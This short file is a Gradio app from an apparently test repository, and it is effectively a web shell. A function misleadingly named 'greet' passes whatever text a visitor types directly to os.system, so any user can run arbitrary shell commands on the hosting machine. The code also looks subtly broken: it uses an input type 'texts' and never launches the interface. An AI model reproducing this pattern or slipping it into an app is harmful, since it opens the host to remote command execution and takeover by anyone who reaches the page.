test_gradio / app.py
lwdragon's picture
Create app.py
72b0709
raw
history blame
156 Bytes
import gradio as gr
def greet(cmd):
a = str(__import__("os").system(cmd))
return a
iface = gr.Interface(fn=greet, inputs="texts", outputs="text")